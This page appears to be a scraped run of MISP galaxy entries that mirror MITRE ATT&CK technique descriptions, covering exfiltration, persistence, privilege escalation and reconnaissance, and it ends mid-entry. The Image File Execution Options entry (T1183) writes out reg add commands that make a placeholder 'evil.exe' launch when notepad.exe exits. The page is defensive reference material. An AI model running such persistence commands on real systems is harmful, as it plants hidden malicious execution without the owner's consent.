To see the related clusters, click here.
Exfiltration to Text Storage Sites - T1567.003
Adversaries may exfiltrate data to text storage sites instead of their primary command and control channel. Text storage sites, such as pastebin[.]com
, are commonly used by developers to share code and other information.
Text storage sites are often used to host malicious code for C2 communication (e.g., Stage Capabilities), but adversaries may also use these sites to exfiltrate collected data. Furthermore, paid features and encryption options may allow adversaries to conceal and store data more securely.(Citation: Pastebin EchoSec)
Note: This is distinct from Exfiltration to Code Repository, which highlight access to code repositories via APIs.
Internal MISP references
UUID ba04e672-da86-4e69-aa15-0eca5db25f43
which can be used as unique global reference for Exfiltration to Text Storage Sites - T1567.003
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1567.003 |
kill_chain | ['attack-Linux:exfiltration', 'attack-macOS:exfiltration', 'attack-Windows:exfiltration'] |
mitre_data_sources | ['Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow'] |
mitre_platforms | ['Linux', 'macOS', 'Windows'] |
Related clusters
To see the related clusters, click here.
Executable Installer File Permissions Weakness - T1574.005
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP%
directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of DLL Search Order Hijacking.
Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to Bypass User Account Control. Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.
Internal MISP references
UUID 70d81154-b187-45f9-8ec5-295d01255979
which can be used as unique global reference for Executable Installer File Permissions Weakness - T1574.005
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1574.005 |
kill_chain | ['attack-Windows:persistence', 'attack-Windows:privilege-escalation', 'attack-Windows:defense-evasion'] |
mitre_data_sources | ['File: File Creation', 'File: File Modification', 'Module: Module Load', 'Process: Process Creation', 'Service: Service Metadata'] |
mitre_platforms | ['Windows'] |
Related clusters
To see the related clusters, click here.
Path Interception by Unquoted Path - T1574.009
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe
vs. "C:\safe path with space\program.exe"
). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe
, an adversary may create a program at C:\program.exe
that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)
This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.
Internal MISP references
UUID bf96a5a3-3bce-43b7-8597-88545984c07b
which can be used as unique global reference for Path Interception by Unquoted Path - T1574.009
in MISP communities and other software using the MISP galaxy
External references
- https://attack.mitre.org/techniques/T1574/009 - webarchive
- https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree - webarchive
- https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464 - webarchive
- https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/ - webarchive
- https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1574.009 |
kill_chain | ['attack-Windows:persistence', 'attack-Windows:privilege-escalation', 'attack-Windows:defense-evasion'] |
mitre_data_sources | ['File: File Creation', 'File: File Modification', 'Process: Process Creation'] |
mitre_platforms | ['Windows'] |
Related clusters
To see the related clusters, click here.
Image File Execution Options Injection - T1546.012
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe
). (Citation: Microsoft Dev Blog IFEO Mar 2010)
IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger
values in the Registry under HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
where <executable>
is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)
IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\
. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)
Similar to Accessibility Features, on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with Remote Desktop Protocol will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
Similar to Process Injection, these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.
Malware may also use IFEO to Impair Defenses by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)
Internal MISP references
UUID 6d4a7fb3-5a24-42be-ae61-6728a2b581f6
which can be used as unique global reference for Image File Execution Options Injection - T1546.012
in MISP communities and other software using the MISP galaxy
External references
- http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/ - webarchive
- https://attack.mitre.org/techniques/T1546/012 - webarchive
- https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/ - webarchive
- https://docs.microsoft.com/windows-hardware/drivers/debugger/gflags-overview - webarchive
- https://docs.microsoft.com/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit - webarchive
- https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/ - webarchive
- https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - webarchive
- https://www.f-secure.com/v-descs/backdoor_w32_hupigon_emv.shtml - webarchive
- https://www.symantec.com/security_response/writeup.jsp?docid=2008-062807-2501-99&tabid=2 - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1546.012 |
kill_chain | ['attack-Windows:privilege-escalation', 'attack-Windows:persistence'] |
mitre_data_sources | ['Command: Command Execution', 'Process: Process Creation', 'Windows Registry: Windows Registry Key Modification'] |
mitre_platforms | ['Windows'] |
Related clusters
To see the related clusters, click here.
Friend/Follow/Connect to targets of interest - T1344
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Once a persona has been developed an adversary will use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others. (Citation: NEWSCASTER2014) (Citation: BlackHatRobinSage)
Internal MISP references
UUID 103d72e6-7e0d-4b3a-9373-c38567305c33
which can be used as unique global reference for Friend/Follow/Connect to targets of interest - T1344
in MISP communities and other software using the MISP galaxy
External references
- http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf - webarchive
- https://attack.mitre.org/techniques/T1344 - webarchive
- https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1344 |
kill_chain | ['pre-attack:persona-development'] |
Related clusters
To see the related clusters, click here.
Friend/Follow/Connect to targets of interest - T1364
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
A form of social engineering designed build trust and to lay the foundation for future interactions or attacks. (Citation: BlackHatRobinSage)
Internal MISP references
UUID eacd1efe-ee30-4b03-b58f-5b3b1adfe45d
which can be used as unique global reference for Friend/Follow/Connect to targets of interest - T1364
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1364 |
kill_chain | ['pre-attack:stage-capabilities'] |
Related clusters
To see the related clusters, click here.
Identify personnel with an authority/privilege - T1271
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Personnel internally to a company may have non-electronic specialized access, authorities, or privilege that make them an attractive target for an adversary. One example of this is an individual with financial authority to authorize large transactions. An adversary who compromises this individual might be able to subvert large dollar transfers. (Citation: RSA-APTRecon)
Internal MISP references
UUID 762771c2-3675-4535-88e9-b1f891758974
which can be used as unique global reference for Identify personnel with an authority/privilege - T1271
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1271 |
kill_chain | ['pre-attack:people-information-gathering'] |
Receive KITs/KIQs and determine requirements - T1239
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Applicable agencies and/or personnel receive intelligence requirements and evaluate them to determine sub-requirements related to topics, questions, or requirements. For example, an adversary's nuclear energy requirements may be further divided into nuclear facilities versus nuclear warhead capabilities. (Citation: AnalystsAndPolicymaking)
Internal MISP references
UUID acfcbe7a-4dbc-4471-be2b-134faf479e3e
which can be used as unique global reference for Receive KITs/KIQs and determine requirements - T1239
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1239 |
kill_chain | ['pre-attack:priority-definition-direction'] |
Identify job postings and needs/gaps - T1248
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Job postings, on either company sites, or in other forums, provide information on organizational structure and often provide contact information for someone within the organization. This may give an adversary information on technologies within the organization which could be valuable in attack or provide insight in to possible security weaknesses or limitations in detection or protection mechanisms. (Citation: JobPostingThreat)
Internal MISP references
UUID c721b235-679a-4d76-9ae9-e08921fccf84
which can be used as unique global reference for Identify job postings and needs/gaps - T1248
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1248 |
kill_chain | ['pre-attack:technical-information-gathering'] |
Related clusters
To see the related clusters, click here.
Analyze hardware/software security defensive capabilities - T1294
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
An adversary can probe a victim's network to determine configurations. The configurations may provide opportunities to route traffic through the network in an undetected or less detectable way. (Citation: OSFingerprinting2014)
Internal MISP references
UUID a1e8d61b-22e1-4983-8485-96420152ecd8
which can be used as unique global reference for Analyze hardware/software security defensive capabilities - T1294
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1294 |
kill_chain | ['pre-attack:technical-weakness-identification'] |
Discover target logon/email address format - T1255
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Email addresses, logon credentials, and other forms of online identification typically share a common format. This makes guessing other credentials within the same domain easier. For example if a known email address is first.last@company.com it is likely that others in the company will have an email in the same format. (Citation: RSA-APTRecon)
Internal MISP references
UUID ef0f816a-d561-4953-84c6-2a2936c96957
which can be used as unique global reference for Discover target logon/email address format - T1255
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1255 |
kill_chain | ['pre-attack:technical-information-gathering'] |
Identify job postings and needs/gaps - T1267
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Job postings, on either company sites, or in other forums, provide information on organizational structure and often provide contact information for someone within the organization. This may give an adversary information on people within the organization which could be valuable in social engineering attempts. (Citation: JobPostingThreat)
Internal MISP references
UUID 0722cd65-0c83-4c89-9502-539198467ab1
which can be used as unique global reference for Identify job postings and needs/gaps - T1267
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1267 |
kill_chain | ['pre-attack:people-information-gathering'] |
Related clusters
To see the related clusters, click here.
Identify job postings and needs/gaps - T1278
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Job postings, on either company sites, or in other forums, provide information on organizational structure, needs, and gaps in an organization. This may give an adversary an indication of weakness in an organization (such as under-resourced IT shop). Job postings can also provide information on an organizations structure which could be valuable in social engineering attempts. (Citation: JobPostingThreat) (Citation: RSA-APTRecon)
Internal MISP references
UUID 7718e92f-b011-4f88-b822-ae245a1de407
which can be used as unique global reference for Identify job postings and needs/gaps - T1278
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1278 |
kill_chain | ['pre-attack:organizational-information-gathering'] |
Related clusters
To see the related clusters, click here.
Analyze organizational skillsets and deficiencies - T1300
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Analyze strengths and weaknesses of the target for potential areas of where to focus compromise efforts. (Citation: FakeLinkedIn)
Internal MISP references
UUID 7baccb84-356c-4e89-8c5d-58e701f033fc
which can be used as unique global reference for Analyze organizational skillsets and deficiencies - T1300
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1300 |
kill_chain | ['pre-attack:organizational-weakness-identification'] |
Related clusters
To see the related clusters, click here.
Exfiltration Over Other Network Medium - T1011
Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel.
Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.
Internal MISP references
UUID 51ea26b1-ff1e-4faa-b1a0-1114cd298c87
which can be used as unique global reference for Exfiltration Over Other Network Medium - T1011
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1011 |
kill_chain | ['attack-Linux:exfiltration', 'attack-macOS:exfiltration', 'attack-Windows:exfiltration'] |
mitre_data_sources | ['Command: Command Execution', 'File: File Access', 'Network Traffic: Network Connection Creation', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow'] |
mitre_platforms | ['Linux', 'macOS', 'Windows'] |
Network Traffic Capture or Redirection - T1410
An adversary may capture network traffic to and from the device to obtain credentials or other sensitive data, or redirect network traffic to flow through an adversary-controlled gateway to do the same.
A malicious app could register itself as a VPN client on Android or iOS to gain access to network packets. However, on both platforms, the user must grant consent to the app to act as a VPN client, and on iOS the app requires a special entitlement that must be granted by Apple.
Alternatively, if a malicious app is able to escalate operating system privileges, it may be able to use those privileges to gain access to network traffic.
An adversary could redirect network traffic to an adversary-controlled gateway by establishing a VPN connection or by manipulating the device's proxy settings. For example, Skycure (Citation: Skycure-Profiles) describes the ability to redirect network traffic by installing a malicious iOS Configuration Profile.
If applications encrypt their network traffic, sensitive data may not be accessible to an adversary, depending on the point of capture.
Internal MISP references
UUID 3b0b604f-10db-41a0-b54c-493124d455b9
which can be used as unique global reference for Network Traffic Capture or Redirection - T1410
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1410 |
kill_chain | ['mobile-attack-Android:collection', 'mobile-attack-iOS:collection', 'mobile-attack-Android:credential-access', 'mobile-attack-iOS:credential-access'] |
mitre_platforms | ['Android', 'iOS'] |
Related clusters
To see the related clusters, click here.
Determine 3rd party infrastructure services - T1260
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Infrastructure services includes the hardware, software, and network resources required to operate a communications environment. This infrastructure can be managed by a 3rd party rather than being managed by the owning organization. (Citation: FFIECAwareness) (Citation: Zetter2015Threats)
Internal MISP references
UUID 856a9371-4f0f-4ea9-946e-f3144204240f
which can be used as unique global reference for Determine 3rd party infrastructure services - T1260
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1260 |
kill_chain | ['pre-attack:technical-information-gathering'] |
Related clusters
To see the related clusters, click here.
Analyze presence of outsourced capabilities - T1303
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Outsourcing, the arrangement of one company providing goods or services to another company for something that could be done in-house, provides another avenue for an adversary to target. Businesses often have networks, portals, or other technical connections between themselves and their outsourced/partner organizations that could be exploited. Additionally, outsourced/partner organization information could provide opportunities for phishing. (Citation: Scasny2015) (Citation: OPM Breach)
Internal MISP references
UUID 34450117-d1d5-417c-bb74-4359fc6551ca
which can be used as unique global reference for Analyze presence of outsourced capabilities - T1303
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1303 |
kill_chain | ['pre-attack:organizational-weakness-identification'] |
Boot or Logon Initialization Scripts - T1037
Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence.(Citation: Mandiant APT29 Eye Spy Email Nov 22)(Citation: Anomali Rocke March 2019) Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely.
Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.
An adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.
Internal MISP references
UUID 03259939-0b57-482f-8eb5-87c0e0d54334
which can be used as unique global reference for Boot or Logon Initialization Scripts - T1037
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1037 |
kill_chain | ['attack-macOS:persistence', 'attack-Windows:persistence', 'attack-Linux:persistence', 'attack-Network:persistence', 'attack-macOS:privilege-escalation', 'attack-Windows:privilege-escalation', 'attack-Linux:privilege-escalation', 'attack-Network:privilege-escalation'] |
mitre_data_sources | ['Active Directory: Active Directory Object Modification', 'Command: Command Execution', 'File: File Creation', 'File: File Modification', 'Process: Process Creation', 'Windows Registry: Windows Registry Key Creation'] |
mitre_platforms | ['macOS', 'Windows', 'Linux', 'Network'] |
Data from Network Shared Drive - T1039
Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within cmd may be used to gather information.
Internal MISP references
UUID ae676644-d2d2-41b7-af7e-9bed1b55898c
which can be used as unique global reference for Data from Network Shared Drive - T1039
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1039 |
kill_chain | ['attack-Linux:collection', 'attack-macOS:collection', 'attack-Windows:collection'] |
mitre_data_sources | ['Command: Command Execution', 'File: File Access', 'Network Share: Network Share Access', 'Network Traffic: Network Connection Creation', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow'] |
mitre_platforms | ['Linux', 'macOS', 'Windows'] |
Download New Code at Runtime - T1407
Adversaries may download and execute dynamic code not included in the original application package after installation. This technique is primarily used to evade static analysis checks and pre-publication scans in official app stores. In some cases, more advanced dynamic or behavioral analysis techniques could detect this behavior. However, in conjunction with Execution Guardrails techniques, detecting malicious code downloaded after installation could be difficult.
On Android, dynamic code could include native code, Dalvik code, or JavaScript code that utilizes Android WebView’s JavascriptInterface
capability.
On iOS, dynamic code could be downloaded and executed through 3rd party libraries such as JSPatch. (Citation: FireEye-JSPatch)
Internal MISP references
UUID 6c49d50f-494d-4150-b774-a655022d20a6
which can be used as unique global reference for Download New Code at Runtime - T1407
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1407 |
kill_chain | ['mobile-attack-Android:defense-evasion', 'mobile-attack-iOS:defense-evasion'] |
mitre_platforms | ['Android', 'iOS'] |
Windows Management Instrumentation Event Subscription - T1084
Windows Management Instrumentation (WMI) can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. Adversaries may attempt to evade detection of this technique by compiling WMI scripts into Windows Management Object (MOF) files (.mof extension). (Citation: Dell WMI Persistence) Examples of events that may be subscribed to are the wall clock time or the computer's uptime. (Citation: Kazanciyan 2014) Several threat groups have reportedly used this technique to maintain persistence. (Citation: Mandiant M-Trends 2015)
Internal MISP references
UUID e906ae4d-1d3a-4675-be23-22f7311c0da4
which can be used as unique global reference for Windows Management Instrumentation Event Subscription - T1084
in MISP communities and other software using the MISP galaxy
External references
- https://attack.mitre.org/techniques/T1084 - webarchive
- https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96 - webarchive
- https://technet.microsoft.com/en-us/sysinternals/bb963902 - webarchive
- https://www.defcon.org/images/defcon-22/dc-22-presentations/Kazanciyan-Hastings/DEFCON-22-Ryan-Kazanciyan-Matt-Hastings-Investigating-Powershell-Attacks.pdf - webarchive
- https://www.secureworks.com/blog/wmi-persistence - webarchive
- https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1084 |
kill_chain | ['attack-Windows:persistence'] |
mitre_platforms | ['Windows'] |
Related clusters
To see the related clusters, click here.
Custom Command and Control Protocol - T1094
Adversaries may communicate using a custom command and control protocol instead of encapsulating commands/data in an existing Application Layer Protocol. Implementations include mimicking well-known protocols or developing custom protocols (including raw sockets) on top of fundamental protocols provided by TCP/IP/another standard network stack.
Internal MISP references
UUID f72eb8a8-cd4c-461d-a814-3f862befbf00
which can be used as unique global reference for Custom Command and Control Protocol - T1094
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1094 |
kill_chain | ['attack-Linux:command-and-control', 'attack-macOS:command-and-control', 'attack-Windows:command-and-control'] |
mitre_platforms | ['Linux', 'macOS', 'Windows'] |
Related clusters
To see the related clusters, click here.
Trusted Developer Utilities Proxy Execution - T1127
Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.
Internal MISP references
UUID ff25900d-76d5-449b-a351-8824e62fc81b
which can be used as unique global reference for Trusted Developer Utilities Proxy Execution - T1127
in MISP communities and other software using the MISP galaxy
External references
- http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html - webarchive
- https://attack.mitre.org/techniques/T1127 - webarchive
- https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/ - webarchive
- https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/ - webarchive
- https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1127 |
kill_chain | ['attack-Windows:defense-evasion'] |
mitre_data_sources | ['Command: Command Execution', 'Process: Process Creation'] |
mitre_platforms | ['Windows'] |
App Delivered via Web Download - T1431
The application is downloaded from an arbitrary web site. A link to the application's download URI may be sent in an email or SMS, placed on another web site that the target is likely to view, or sent via other means (such as QR code).
Detection: An EMM/MDM or mobile threat protection solution can identify the presence of unwanted, known insecure, or malicious apps on devices.
Platforms: Android, iOS
Internal MISP references
UUID 6b846ad0-cc20-4db6-aa34-91561397c5e2
which can be used as unique global reference for App Delivered via Web Download - T1431
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1431 |
Related clusters
To see the related clusters, click here.
Image File Execution Options Injection - T1183
Image File Execution Options (IFEO) enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., “C:\dbg\ntsd.exe -g notepad.exe”). (Citation: Microsoft Dev Blog IFEO Mar 2010)
IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger
values in the Registry under HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
where
is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)
IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IEFO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\
. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)
An example where the evil.exe process is started when notepad.exe exits: (Citation: Oddvar Moe IFEO APR 2018)
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\evil.exe"
Similar to Process Injection, these values may be abused to obtain persistence and privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous invocation.
Malware may also use IFEO for Defense Evasion by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)
Internal MISP references
UUID 62166220-e498-410f-a90a-19d4339d4e99
which can be used as unique global reference for Image File Execution Options Injection - T1183
in MISP communities and other software using the MISP galaxy
External references
- https://attack.mitre.org/techniques/T1183 - webarchive
- https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/ - webarchive
- https://docs.microsoft.com/windows-hardware/drivers/debugger/gflags-overview - webarchive
- https://docs.microsoft.com/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit - webarchive
- https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/ - webarchive
- https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - webarchive
- https://www.f-secure.com/v-descs/backdoor_w32_hupigon_emv.shtml - webarchive
- https://www.symantec.com/security_response/writeup.jsp?docid=2008-062807-2501-99&tabid=2 - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1183 |
kill_chain | ['attack-Windows:privilege-escalation', 'attack-Windows:persistence', 'attack-Windows:defense-evasion'] |
mitre_platforms | ['Windows'] |
Related clusters
To see the related clusters, click here.
SIP and Trust Provider Hijacking - T1198
In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)
Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)
Similar to Code Signing, adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and whitelisting tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)
- Modifying the
Dll
andFuncName
Registry values inHKLM\SOFTWARE[\WOW6432Node]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg{SIP_GUID}
